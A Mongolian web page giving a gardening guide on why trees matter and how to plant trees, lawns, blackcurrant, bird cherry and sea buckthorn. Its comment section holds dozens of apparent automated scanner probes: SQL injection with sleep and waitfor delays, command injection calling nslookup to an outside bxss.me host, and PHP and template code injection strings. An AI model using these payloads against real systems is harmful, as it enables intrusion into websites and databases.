Мод тарих ач холбогдол


Мод тарих ач холбогдол

Дэлхийн хөгжил өсөн нэмэгдэхийн хэрээр   байгалийн орчин хүний  шууд болон шууд бус үйл ажиллагааны нөлөөгөөр унаган төрхөө алдаж байгаа билээ. Хүн, ургамал, ан амьтан, ус, агаар бичил биетэн гээд байгалийн бүх баялаг ой модноос хамааралтай.

Уур амьсгалын өөрчлөлтийг сааруулах, агаарын бохирдлыг бууруулахад ой мод хамгийн чухал үүрэг гүйцэтгэнэ.

•   Мод ургамал нь агаарын чийгшлийг 4-7% ихэсгэдэг байна.

•   Мод нь дуу чимээ намсгахын дээр зуны улиралд шороо тоосны 50% өвлийн улиралд 40% -ийг өөртөө шингээж агаар цэвэрлэдэг байна.

•   Модны навч нүүрсхүчлийн хийг шингээж хүчилтөрөгчийг ялгаруулдаг. Тухайлбал: 1га ойн талбай 1 цагийн дотор ойролцоогоор 8кг буюу 180 орчим хүний ялгаруулсан нүүрсхүчлийн хийг өөртөө шингээн авдаг байна.

•   Мод нь фитонцид /өвчин үүсгэгч нянгийн эсрэг үйлчилгээтэй бодис/ ялгаруулдаг. Тухайлбал:  нэг га навчит ой 3кг, шилмүүст ой 5кг байх жишээтэй.

•   Мод нь хөрс хамгаалдаг байна.

Мод, сөөг тарих аргачлал

Тарих хугацаа

Хаврын улиралд 04.25-наас 06.01-ны хооронд, намрын улиралд 9.25-аас 11.01-ны хооронд  мод тарихад тохиромжтой.

Энэ хугацаанд мод тарихад хавар бол модны нахиа задраагүй, намар бол навч нь бүрэн хагдарсан байдаг учир амьдрах чадвар сайн байна.                                         

     Хаврын суулгац тарихад оройн нахиа хатсан эсэхийг сайн шалгаж авах хэрэгтэй. Оройн нахиа хатсан эсэхийг мэдэхийн тулд суулгацын үзүүрийг хугалж үзнэ.  Орой нь хатаагүй суулгацын үзүүр уян зөөлөн байна. Хэрэв хатсан байвал үзүүр нь хатаж  хугарсан байх бөгөөд гар хүрмэгц хугарна. Ийм суулгацын амьдрах чадвар муу байдаг. Мөн олон настай хөгшин суулгац амьдрах чадвар муутай байдгийг анхаарах хэрэгтэй.

Мод тарихын өмнө

Мод, сөөгний суулгацыг сонгож авахдаа дараах зүйлсийг анхаарах хэрэгтэй. Үүнд: 

-   Суулгацын гадана талын өнгө байдал хэвийн буюу шалбарч гэмтээгүй, өвчин хортонд нэрвэгдээгүй байх

-   Нахиа нь задраагүй, тээвэрлэлтийн явцад үндэс нь хатаагүй байх

-   Мөчир салаалсан үндэс ихтэй байхын дээр үржил шимтэй шороотой байх

-   Гол иш нь эгц шулуун, бат бэх, хугараагүй байх

-   Өсөлт хөгжилт сайтай байх

Ургах орчин

Мод тарихдаа барилга байшинтай хэт ойр тарьж болохгүйг анхаарах хэрэгтэй. Тухайлбал гацуур, шинэс, нарс зэрэг модыг хашаа байшингаас 5 метрийн зайтай тарих нь зохимжтой. Цонхны ойр тарьсан мод хэдэн жилийн дараа нар халхлах магадлалтайг бодолцох хэрэгтэй.

Мод тарих нүх ухах

Мод, сөөгийн нүхийг ухаж байхдаа үржил шимтэй өнгөн шороог нүхний нэг талд, доод талын үржил шимгүй шороог нүхний нөгөө талд тус тусад нь овоолж, 70-80 см-ийн голчтой, 50-60 см-ийн гүнтэй ухна.

Тарих

Мод, сөөг тарих нүхэндээ 50 хувьд нь  хар шороо, 30 хувьд нь   элс, 20  хувьд нь  хөх бууц  сайтар хольж хөрсөө бэлдэнэ. Бэлдсэн хөрсний гол хэсэгт модныхоо үндсийг тараан байрлуулж, шороогоор хучиж, гишгэлэн шороог нягтруулж, агаар орохгүйгээр чигжиж өгнө. Тарьсан модны үндэс нугалраагүй шулуун, үндэсний үзүүр доош чиглэсэн байх ёстой. Тарьц, суулгацыг  нүхний ёроолд хэтэрхий гүн суулгаж болохгүй. Модны үндэсний хүзүү нүхний ирмэгийн төвшнөөс 10-15 см доор байрлах нь зөв.

Усалгаа.

Мод, сөөгийг ургуулахад хамгийн чухал зүйл бол усалгаа юм. Шанагаар услах, хайрцаглах аргаар услах, тогоогоор услах гэх мэтийн аргууд бий.

Модыг  тарьсан өдөртөө  60-80 литр, сөөгийг 20-30 литр  усаар заавал услах шаардлагатай. Усалгааг өглөө, орой хийдэг. Анх суулгасан модны иш  орчим хэт даралттай усаар  усалж болохгүй. Усалгааг нүхний  дотор талын ханыг дагуулан  зөөлөн услах хэрэгтэй.

Оройн цагт 7-10 хоногт 1-2 удаа усална. 10 сард цэнэг усалгааг ханатал хийнэ. Усалгаа хийх явцад хөрсний сийрэгжүүлэлт хийнэ. 3 жилийн дараагаас үндэс нь гүний усанд хүрдэг тул арчилгаа усалгааг хийх шаардлагагүй болно.

Зүлэг тарих аргачлал

Зүлэг тарих талбайн хөрсийг бэлтгэхийн тулд дагтаршсан газрыг хүрз, жоотуу, тармуураар 15-20 см гүн ухан том чулуу, дунд зэргийн чулуу, зэрлэг ургамалын үндэс зэргийг шигшин авахын зэрэгцээ үржил шимт шинэ хар шороо нэмж жигд тараан тарих газрыг тармуураар тэгшлэх хэрэгтэй байдаг.

Зүлэгжүүлэх зорилгоор олон наст ургамлыг тариалсан тохиолдолд байнга усалж байх шаардлагатай бөгөөд хөрсний гадарга тэгш биш байвал ус тогтохгүй алдагдах болно. Зарим налуу газрын талбайг тариалтанд бэлтгэхдээ шатлан бэлтгэх арга байдаг. Зүлэг тарих талбайн хэмжээнээс хамаарч техникээр болон гар ажиллагаагаар хөрсийг боловсруулж элстэй хольж хөнгөн бүтэцтэй болгож, хар шороо нэмж бууцаар бордож талбайг засна. Тэгшилж бэлэн болсон талбайн нэг захаас 1м2 талбай бүрийг дахин хавтгай мод тавин дарж сул хөрсийг нягтруулан тэгшилээд 60-100 г үрийг жигд тараан цацаж дээрээс нь уулын хар шороо ба элсний холимгоор үрийг далд ортол/үр ил гарахгүй байхаар буюу 1-2 см зузаан цацаж дарна. Дараа нь тэгш хавтангаар сайтар дарж үрийг хөрсөнд суулгаж өгнө. Гэхдээ практик дээр м2 бүрийг хавтгай мод тавин дарах нь хэт их ажиллагаатай байдаг тул заавал тэгэх шаардлагагүй юм.

Үхрийн нүд суулгах

Үхрийн нүд нь янз бүрийн насны олон найлзуур бүхий 1-2.5 м хүртэл өндөр ургадаг, олон наст, жинхэнэ сөөг ургамал юм. Үхрийн нүд нь хөрс, цаг уур, гарал үүслийн онцлог, ургуулах агротехник зэрэг олон хүчин зүйлээс хамааран 10-20 жил амьдарч, 5-7 насандаа хамгийн арвин ургац өгөх ба цаашид жил ирэх тутам жимсний гарц нь буурна. Үхрийн нүдийг намар газар хөлдөхөөс сарын өмнө 9-дүгээр сарын сүүлч, 10-дугаар сарын эхээр суулгах нь хамгийн тохиромжтой хугацаа юм. Мөн хавар суулгаж ч болно.

Суулгац сонгох, тээвэрлэх, хадгалах.

Суулгалтад 2-3 настай, мөчир, сайн хөгжсөн үндэстэй, бойжилт сайтай, өвчин хортонд нэрвэгдээгүй, гарал үүсэл нь тодорхой эрүүл суулгацыг сонгон авч суулгана. Үхрийн нүдний ихэнх сортууд өөртөө тоос хүртээдэг боловч өөр сортуудыг хольж таривал солбицон тоос хүртэж түүний үр дүнд жимслэлт нэмэгддэг бөгөөд илүү арвин ургац өгдөг учир суулгац сонгож авахдаа анхаарах хэрэгтэй.

Суулгацын нас нь жимслэх хугацаа, ургацад нөлөөлдөг учир 2-оос доошгүй настай суулгацын амьдралт сайн, жимсний ургац илүү их байх болно. Үхрийн нүдний суулгацыг моностой адилхан аргаар тээвэрлэнэ. Суулгацыг суулгах хүртэл болон суулгах хугацаанд үндсийг хатаахгүй чийгтэй байлгахын тулд шороон зуурмагт дүрж, сэрүүн газар түр хадгалах шаардлагатай.

Нүх ухаж бэлтгэх.

Хагалж бордсон, хог ургамлаас цэвэрлэн тэгшилж зассан талбайд эгнээ хооронд 1.5-2.5 м, ургамал хооронд 1.25-1.5 м зайтай байхаар 50-60 см диаметртэй, 35-40 см гүн нүх ухаж суулгахад бэлтгэнэ.

Бордоо.

Үржил шимээр дунд зэргийн хөрсөнд үхрийн нүд суулгах бол нүх бүрд 1-2 хувин ялзмагт багсармал, 200 гр суперфосфат, 300 гр модны үнс, 30 гр хлорт кали.100 гр нунтаг шохой орох тооцоогоор хөрсний холимог бэлтгэнэ. Ухсан нүхнийхээ гуравны хоёрыг дүүртэл органик болон эрдэс бордоо хольж найруулсан хөрсний холимгийг хийнэ.

Үхрийн нүд суулгах.

Суулгацыг цөөн тоогоор хувинд хийж зөөх ба үндсийг нойтон шороотой нь хамт суулгахад үндэс гэмтэхгүй, суулгац хөрсөндөө хялбар дасан зохицож сайн ургана. Суулгацыг үндэсний хүзүү нүхний амсраас 8-10 см дор байхаар суулгана. Суулгац суулгахад 2 хүн ажиллах ба нэг нь суулгацыг нүхэнд тохируулан барьж, нүхний гуравны хоёрыг дүүртэл овоолж хийсэн хөрсний холимогт үндсийг нь жигд тарааж өгөхөд нөгөө хүн нь хөрсний үлдсэн холимгийг нүхэнд хийн нягтруулж өгнө. Ялангуяа, нүхний дотор захын хөрсийг илүү нягтруулж өгвөл услахад хөрс доош суухгүй, үндэс ил гарахгүй байх сайн талтай.

Суулгацаа суулгасны дараа нүхний амсрын эргэн тойронд шороог тэгшилж газрын гадаргаар борооноос ус тогоо руу урсахад саадгүй болгож өгөөд ханатал усалж, хөрсөнд ус гүйцэд шингэсний дараа хөрсний гадаргыг бууцаар 5-10 см зузаан хучиж өгвөл хөрс хагарахгүйгээс гадна хөрсний гадаргаас ус уурших нь багасна.

Үхрийн нүд ургуулахад хийгдэх ажлын календарчилсан төлөвлөгөө

Хийгдэх ажил

5 сар

6 сар

7 сар

8 сар

9 сар

10 сар

 

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

Суулгац ухаж авах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Суулгах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Усалгаа

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хөрс сийрэгжүүлэлт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Өвөлжилтиийн бэлтгэл

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

                                                             

Суулгасны дараах арчилгаа.

Үхрийн нүдийг суулгаснаас хойш 8-10 хоноод дахин усална. Суулгац орчиндоо дасаж ургаад тодорхой өсөлт өгч эхэлсний дараа шаардлагатай гэж үзвэл суулгацыг тайрч танаж болно. Нүхэнд суулгацаа суулгаад 5 см өндөр иш үлдээж гол ишийг нь тайрах ба цаашдаа үндэсний хүзүүвч ишний доод хэсгийн унтаа нахиа сэргэн ургах явцад ч тайралтыг үргэлжлүүлж болно. Органик болон эрдэс бордоогоор бордож үхрийн нүд суулгасан эхний нэг, хоёр жилд залуу ургамал шим тэжээлээр хангагдах учир нэмэлт бордоо шаардахгүй. Харин мөчрийн өсөлтийг түргэсгэхийн тулд сөөг бүрд 15-20 гр шүвтрийн /......./ шүүгээр бордоно. Суулгацаа суулгаснаас хойш гурав дахь жилийн хавар усаар 1:4-ийн харьцаагаар шингэлсэн бууцны уусмал, эсвэл усаар 1:12-ын харьцаагаар шингэлсэн сангасны уусмалаар сөөг бүрд нэг хувин, намар 6-8 кг бууцаар нэмж бордоно. Хэрэв анх суулгахдаа бордоо хэðэглээгүй бол гурав дахь жилийн хавар эрт макро, микро элемент агуулсан нийлмэл бордоогоор бордож, сарын дараа 1 ам метр тутамд 30 гр сульфат аммони орох тунгаар бордоно.

Үхрийн нүдийг суулгасны дараа 4-5 дахь жилдээ бүрэн жимсэлж арвин ургац өгөх бөгөөд гурав дахь жилээс зарим салааг танаж, сөөгийг сийрүүлэхэд хөрснөөс авсан тэжээлийн бодис хорогдох учир түүнийг нөхөж өгөх шаардлагатай болдог.

Үхрийн нүдний зонхилох өвчин, хортон.

Үхрийн нүд гуалах, дэлбэжих, сэвхтэх, толботох, зэв зэрэг өвчнөөр өвчилдөг. Үхрийн нүдний эдгээр өвчнүүдтэй тэмцэх арга тус бүрдээ өөр өөр юм. Хэрэв үхрийн нүдэнд ямар нэгэн хөнөөлт шавж, өвчин гарвал мэргэжлийн байгууллагад хандах нь зүйтэй.

Монос суулгах

Азийн монос нь 3-7 м өндөр ургадаг сөөг юм. Газрын хөрснөөс дээш богино иш гарч тэр нь цааш бутлан салаалж ургадаг. Анхилуун үнэртэй 5 илтэс бүхий цагаан өнгийн цэцгүүдээс тогтсон баг цэцгүүдтэй. Монос нь мойл хэмээх, хар өнгийн, бөөрөнхий жимстэй ба жимс нь аргуун, ясархаг, гүйцэд боловсорсон нь тас хар өнгөтэй, шүүслэг байдаг. Моносны жимс алим, нимбэгийн хүчил, чихэрлэг болон аргаах бодис, эфирийн тос агуулдаг. Жимсийг гүйцэд боловсорсны дараа түүж, хатааж нунтаглаад гурилан бүтээгдэхүүн, цагаан тостой хольж хүнсэнд хэрэглэнэ. Монос нь хүнсний болон хот цэцэрлэгжүүлэхэд гоёл чимэглэлийн ач холбогдолтой.

Монос нь сагсайж, буталж үзэмжтэй ургахаас гадна аятайхан үнэртэй тул хот цэцэрлэгжүүлэлт төдийгүй айл өрх хашаандаа тарьж өргөнөөр ашиглаж болно.

Монос 6 дугаар сарын эхээр цэцэглэх ба цагаан цэцэг жигд дэлгэрэхэд орчноо үзэмжтэй сайхан харагдуулдаг. Цэцэглэлтийн хугацаа 15 орчим хоног үргэлжилдэг.

Моносны суулгацыг сонгох, тээвэрлэх, хадгалах.

Зохих нөхцөлд сайтар арчилж ургуулсан 2-3 настай тарьц суулгацыг хотын цэцэрлэгжилт, гэр хорооллын тохижилтод зориулж шилжүүлэн суулгана.

Тарих суулгацаа тээвэрлэх болон хадгалах явцад үндсийг нь хатаахгүйн тулд хэд хэдээр нь багцлан боож, үндэсний хэсгийг нь усаар зуурсан шороон зуурмагт дүрж, дээрээс нь нойтон шороогоор зузаалан шавах ба ингэж бэлтгэсэн суулгацын үндэсний хэсгийг гялгар уутаар битүүлж бооно.

Ийм маягаар бэлтгэсэн суулгацын үндэс хатахгүй, найдвартай хамгаалагдана. Суулгах хүртлээ суулгацаа газар ухан хийж, таглан түр хадгалж болно.

Нүх ухаж бэлтгэх.

Шилжүүлэн суулгах монос суулгацын нүхний диаметр 60 см, гүн нь 50 см хэмжээтэй байвал тохиромжтой.

Нүх ухахад гарсан шороог шигшиж, чулуу, хайрга, элдэв хог зэрэг бүхий л хольцоос нь салгаж, ялган зөөж, зайлуулна. Монос суулгах нүхэнд хийх хөрсийг хар шороо 60 хувь, элс 30 хувь, бууц 10 хувь байхаар тооцож бэлтгэнэ.

Бэлтгэсэн нүхийг моносны суулгацыг суулгахын өмнө усалж чийгшүүлнэ. Бэлтгэсэн нүхэндээ үржил шимт хөрс шороо хийж, ялимгүй хонхойлоод дээр нь суулгацаа тэгшхэн хийж, эргэн тойрон шороогоор сайн чигжиж өгнө. Шороо нүхний ирмэгээс 10-15 см дор байхаар бодож суулгах хэрэгтэй. Энэ нь услахад 1 удаа их хэмжээний ус хийх боломж бүрдүүлдэг.

Моносны суулгац суулгах.

Мод суулгах талбай дээрээ ажиллахдаа суулгацаа зоориноос цөөн тоогоор авч, томхон хувин, саванд хийж, үндэсний хэсгийг нойтон шороогоор хучих хэрэгтэй. Ийнхүү суулгацаа хувинд хийж зөөвөрлөх нь нэг талаас үндсийг хатаахгүй сайн талтайгаас гадна нөгөө талаас ажиллахад амар хялбар байдаг. Суулгацаа үндсийг нь гэмтээлгүй нэг нэгээр нь салгаж, нэг хүн нь урьдчилан бэлтгэсэн нүхэнд суулгацыг эгц барьж өгөх ба нөгөө хүн нь хүрзээр бэлтгэсэн шороогоо нүхэнд хийж, болгоомжтой зөөлөн гишгэж нягтруулна.

Усалгаа.

Моносыг суулгасны дараа нэг нүхэнд 20-30 л ус ногдохоор бодож усална. Хур бороогүй гандуу үед хөрсийг өлөн чийгтэй байхаар бодож 7 хоногт 2-3 удаа усална. Модыг өглөө 9 цагаас өмнө, орой 10 цагаас хойш харьцангуй бүлээн усаар, хавар намрын сэрүүнд ердийн температуртай усаар тус тус услах нь тухайн мод, сөөгийн ургалтад эерэг нөхцөл бүрдэх боломжтой юм. Намар мод, сөөгийн ургалт зогсоосны дараа цэнэг усалгааг хийх ба энэ нь дараа жилийн чийгийн хангамжийг дээшлүүлэх сайн талтай.

Чацарганы суулгац ургуулахад хийгдэх ажлын календарчилсан төлөвлөгөө

Хийгдэх ажил

5 сар

6 сар

7 сар

8 сар

9 сар

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

Суулгац ухаж авах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Суулгах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Усалгаа

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хөрс сийрэгжүүлэлт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Чацаргана суулгах

Чацарганы төрөл зүйлээс хамгийн өргөн тархацтай нь яшилдуу чацаргана юм. Яшилдуу чацаргана байгалийн нөхцөлд аясаараа ургахдаа 1.5-5 м, түүнээс ч өндөр, тарималжуулсан нөхцөлд тухайн сортын биологийн онцлогоос хамаарч, хэлбэржүүлэх таналтын нөлөөнд 3-4 м өндөр ургадаг сөөг ба модны завсрын шинж бүхий өвөрмөц бүтэцтэй сөөг ургамал юм. Чацарганы гол иш тодорхой хугацаанд наслаад өтөлж, хатаж үхэхэд түүний эргэн тойронд үүссэн залуу иш түүний халааг авч, амьдрал нь тасралтгүй үргэлжилдэг онцлогтой. Чацаргана 4-5 насандаа үр жимсээ өгч эхлэх ба 30-40 жил амьдарна. Манай оронд тарималжуулсан хамгийн ургац сайтай сортын нэг мод 25.8 кг, хамгийн бага ургацтай сортын нэг мод 4.8 к;г жимс өгдөг байна.

Суулгац сонгох, тээвэрлэх хадгалах.

Чацарганы цэцэрлэг байгуулахад 2 наснаас дээшгүй, стандартын 1 дүгээр зэргийн, ургал (мөчир, үндэс г.м) эрхтнээр үржүүлсэн суулгацыг ашиглах нь чухал юм. 1 дүгээр зэргийн суулгац нь үндэсний хүзүү орчмоороо 15 мм-ээс бүдүүн, үндэс нь 20 см-ээс урт, 2 салбарласан, газрын дээрх ишний хэсэг нь 50-60 см өндөр байна. Чацарганы суулгацыг тээвэрлэх, хадгалах арга нь монос болон үхрийн нүднийхтэй адил байна.

Чацарганы эр, эмийг таних арга.

Үрээр ургуулсан чацарганы суулгац эхний үедээ эр, эм нь ялгарч танигдахгүй байснаа 3-5 дахь жилдээ цэцгийн болон мөчрийн нахиатай болох үедээ энэ ялгаа нь тодорч эхэлнэ. Эр чацарганы нахиа намар орой, өвөл, хаврын улиралд задраагүй байхдаа олон давхар хайрстай, хэмжээгээрээ том, хоорондоо ойр байрласан байх ба сайн ажиглавал нэг наст мөчир нь эмийнхээсээ бүдүүн байдаг. Эм чацарганы нэг наст мөчир нь нарийн турьхан, нахиа нь гол төлөв 2 хайрстай, эрийнхээсээ жижиг, хоорондоо хол байрласан байдаг.

Талбай сонгох.

Чацарганыг агааржилт сайтай, сийрэг элсэнцэр, бага зэргийн шавранцар, сул хүчиллэг, саармаг орчинтой (рН=6.5-7.0), ялзмаг ихтэй, фосфорын давс 100 гр тутамд 20 мг-аас багагүй хөрсөнд тариалах нь тохиромжтой. Чацаргана суулгах газар бага зэрэг налуу байвал ус тунаж тогтохгүй сайн талтай бөгөөд харьцангуй тэгш гадаргуутай ч байж болно. Агааржилт муутай, хүнд шавранцар хөрстэй, цас борооны ус тунадаг хотгор гадаргуутай талбайд чацаргана суулгаж болохгүй. Чацарганы үндэсний систем хөрсний өнгөн хэсэгт гүехэн байрладаг учир услах боломжтой газар сонгож суулгах хэрэгтэй. Агааржилт муутай нягт хөрсөнд элс, жижиг ширхэгтэй хайрга, бууцыг ахиухан хийж сийрэгжүүлэн хөрсний бүтцийг сайжруулж суулгаж болно.

Нүх ухаж бэлтгэх.

Засаж бэлтгэсэн талбайд 40-50 см өргөн, 35-40 см гүн нүх ухаж, урьдчилан бэлтгэсэн зохих найрлагатай хөрсийг нүхнийхээ гуравны нэгийг дүүртэл овоолж хийнэ.

Чацаргана тарих схем.

Чацарганыг тэгш өнцөгт ба цувруулж эгнүүлэн суулгаж болно. Ихэнх сортын чацарганы бут өсөлт гүйцэж, бүрэн жимслэх үедээ 2.5-3.0 м голчтой титэм үүсгэдэг учир байнгын талбайд суулгацыг хооронд нь 2.5-3.0 м зайтайгаар суулгах хэрэгтэй. Хэрвээ нэг эгнээгээр цувруулан тарьж байгаа бол суулгац хоорондын зайг 1.5-2.0 м болгон багасгаж болно. Чацарганыг цувруулж хэд хэдэн эгнээгээр тарихад эгнээ хооронд 3-4 м, эгнээний уртын дагуу 60-70 см өргөн, 50-60 см гүн шуудуу ухаж бэлтгэнэ. Эдгээр нүх шуудуунд тарих суулгац тутамд 200 гр суперфосфат, 25 гр хлорт кали орохоор тооцож, хөрсний холимогт бордооны тунг тохируулж хэрэглэнэ.

Чацарганы суулгацыг суулгах.

Чацарганы суулгацаа бэлтгэсэн нүхэндээ үндсийг нь жигд тараан суулгаад дээрээс нь үлдсэн хөрсөөр үндэсний хүзүүг 5-7 см далд ортол булж, эргэн тойронд нь гишгэж, хөрсийг бага зэрэг нягталж өгнө.

Тэгш өнцөгт байрлалаар суулгахдаа голд нь эр ургамлыг, эргэн тойронд нь эмийг байрлуулж, суулгана. Цувруулж эгнүүлэн суулгах бол эрийг нь салхины голлох чиглэлийн дээд талд байрлуулж, 8-10 эм ургамалд нэг эр ургамал ногдох харьцаагаар суулгахад болно.

Чацарганы суулгацыг байнгын талбайд хавар тухайн нутаг, жилийн цаг агаарын онцлогийг харгалзан 4 дүгээр сарын сүүлч, 5 дугаар сарын эхээр нахиа задраагүй байхад суулгах нь хамгийн тохиромжтой бөгөөд хэрэв намар тарих бол газар хөлдөхөөс 20-40 хоногийн өмнө суулгана. Суулгасан тарьсан хөрсийг бага зэрэг нягтруулж, гишгэн усална.

Чацарганы суулгац ургуулахад хийгдэх ажлын календарчилсан төлөвлөгөө

Хийгдэх ажил

5 сар

6 сар

7 сар

8 сар

9 сар

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

1

2

3

4

Суулгац ухаж авах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Суулгах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Усалгаа

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хөрс сийрэгжүүлэлт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Бордоо

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Таналт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

                                                 

 

Суулгасны дараах арчилгаа.

Байнгын талбайд суулгацаа суулгасны дараах арчилгаанд услах, нэмж бордох, усалсны дараа хөрсний өнгөн хэсгийг сийрүүлэх, хог ургамал, өвчин хорлогчийг устгах, хатсан мөчир, үндэслэг ишнээс ургасан найлзуурыг тайрах зэрэг ажиллагаа орно.

Чийг хангалттай нөхцөлд чацаргана сайн ургадаг учир эрчимтэй ургаж байгаа 6-7 дугаар сард тухайн хөрсний ус шингээж барих онцлог, цаг агаарын тухайн үеийн байдлыг харгалзан усалгааг сайн тохируулах хэрэгтэй.

Жил бүрийн намар 10 дугаар сард суулгасан суулгацын эргэн тойрон болон сөөг хоорондох талбайн 1 ам м бүрд 6-8 кг бууц, 80-100 гр суперфосфат, 10 гр калийн давс орохоор тооцож бордоно. Азотын бордоог зөвхөн хавар бага багаар хэрэглэнэ. Намар 9 дүгээр сарын сүүлч, 10 дугаар сарын эхээр чацарганын нэг сөгөөнд ойролцоогоор 6-12 хувин ус орохоор тооцож, намрын цэнэг усалгааг хийж, хөрсөнд ус бүрэн шингэсний дараа сөөгийн эргэн тойрны хөрсийг өнгөц (5-7см) сийрүүлж өгнө.

Хэлбэржүүлэх таналт.

Чацарганы титмийг хэт өндөр биш, нягт сийрэг нь тохирсон, мөчир салаа нь зөв хөгжсөн байхаар бодож суулгаснаас хойш 3-5 дахь жилээс хатаж, хугарсан, хэт оройтож бие биеэ сүүдэрлэсэн зэрэг илүүдэл мөчрийг тайрч хэлбэржүүлэх таналтыг хийнэ. Чацаргана хөгшрөөд ирэхээр мөчрийн жилийн өсөлт 10-15 см-ээс хэтрэхгүй болж доройтох, үндсэн гол иш нь үхэх тохиолдол байдаг учир өсөлт доройтсон 3-4 настай модлог мөчрийг тайрч, залуужуулах арга хэрэглэнэ. Хэлбэржүүлэх таналтыг хавар эрт нахиа задрах, шүүс хөдлөхөөс өмнө хийнэ. 5-7 жилд мөчир салаалах бэлчирт зөвхөн нэг мөчир үлдээж бусдыг тайрч залуужуулах арга хэмжээ авна.

Чацарганын өвчин, хортон.

Чацарганы өвчин хортны талаарх судалгаанаас үзэхэд чацарганд багагүй хор хөнөөл учруулдаг 30 зүйлийн өвчин үүсгэгч мөөг, 50 гаруй зүйлийн шавж, 3 зүйл хачиг, 5 зүйл хөхтөн, 12 зүйлийн шувуу байдаг нь тогтоогдсон. Чацаргана суулгасан талбайд ямар өвчин хортон тохиолдож байгааг ажиглан, мэргэжлийн байгууллагад хандаж, хугацаа алдалгүй устгах арга хэмжээг авснаар чацарганаа хамгаалж чадах юм.

Ашигласан материал

  • Байгаль орчны яам, Монголын байгаль орчны консорциум, Нидерландын засгийн газар, Дэлхийн банк “Цэцэг, зүлэг тарих, мод суулгах, бут сөөг ургуулах зөвлөмж”
  • БОНХАЖЯ “Мод тарих гарын авлага”. Улаанбаатар 2015 он.)
  • https://www.mne.mn 

 

- share

Сэтгэгдэл (80)

  • qlbkkbeq

    1

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • klrxfeai

    set|set&set

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • klrxfeai

    $(nslookup dns.ce.\045557.24-71.24.6fbf6.\1.bxss.me)

    2018-07-22
  • scmxhfvg

    rm5DftWB

    2018-07-22
  • klrxfeai

    &nslookup dns.ce.\045557.24-72.24.6fbf6.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.24-72.24.6fbf6.\1.bxss.me&`'

    2018-07-22
  • ektvdupl

    ${9999502+10000193}

    2018-07-22
  • scmxhfvg

    -1 OR 2+43-43-1=0+0+0+1 --

    2018-07-22
  • scmxhfvg

    -1 OR 2+829-829-1=0+0+0+1

    2018-07-22
  • scmxhfvg

    -1' OR 2+267-267-1=0+0+0+1 --

    2018-07-22
  • xntxfjpy

    )

    2018-07-22
  • ${9999820+10000152}

    1

    2018-07-22
  • scmxhfvg

    -1' OR 2+272-272-1=0+0+0+1 or 'c6n2jW7x'='

    2018-07-22
  • xntxfjpy

    !(()&&!|*|*|

    2018-07-22
  • xntxfjpy

    ^(#$!@#$)(()))******

    2018-07-22
  • scmxhfvg

    -1" OR 2+632-632-1=0+0+0+1 --

    2018-07-22
  • scmxhfvg

    if(now()=sysdate(),sleep(6),0)

    2018-07-22
  • set|set&set

    1

    2018-07-22
  • scmxhfvg

    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

    2018-07-22
  • $(nslookup dns.ce.\045557.24-77.24.6fbf6.\1.bxss.me)

    1

    2018-07-22
  • &nslookup dns.ce.\045557.24-78.24.6fbf6.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.24-78.24.6fbf6.\1.bxss.me&`'

    1

    2018-07-22
  • scmxhfvg

    0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

    2018-07-22
  • scmxhfvg

    (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

    2018-07-22
  • )

    1

    2018-07-22
  • !(()&&!|*|*|

    1

    2018-07-22
  • scmxhfvg

    -1; waitfor delay '0:0:3' --

    2018-07-22
  • ^(#$!@#$)(()))******

    1

    2018-07-22
  • vgbpbiuq

    ;print(md5(acunetix_wvs_security_test));

    2018-07-22
  • scmxhfvg

    -1); waitfor delay '0:0:3' --

    2018-07-22
  • vgbpbiuq

    ';print(md5(acunetix_wvs_security_test));$a='

    2018-07-22
  • vgbpbiuq

    ";print(md5(acunetix_wvs_security_test));$a="

    2018-07-22
  • scmxhfvg

    1 waitfor delay '0:0:3' --

    2018-07-22
  • vgbpbiuq

    ${@print(md5(acunetix_wvs_security_test))}

    2018-07-22
  • scmxhfvg

    dlpgr9F5'; waitfor delay '0:0:6' --

    2018-07-22
  • vgbpbiuq

    ${@print(md5(acunetix_wvs_security_test))}\

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • scmxhfvg

    -1;select pg_sleep(6); --

    2018-07-22
  • buujmrri

    1'"

    2018-07-22
  • scmxhfvg

    -1);select pg_sleep(6); --

    2018-07-22
  • buujmrri

    \

    2018-07-22
  • scmxhfvg

    -1));select pg_sleep(6); --

    2018-07-22
  • scmxhfvg

    mNU1ad8C';select pg_sleep(9); --

    2018-07-22
  • scmxhfvg

    HWar3FYK');select pg_sleep(9); --

    2018-07-22
  • buujmrri

    @@eijcx

    2018-07-22
  • scmxhfvg

    HR713Tvv'));select pg_sleep(9); --

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • buujmrri

    JyI=

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • duBgawM6

    1

    2018-07-22
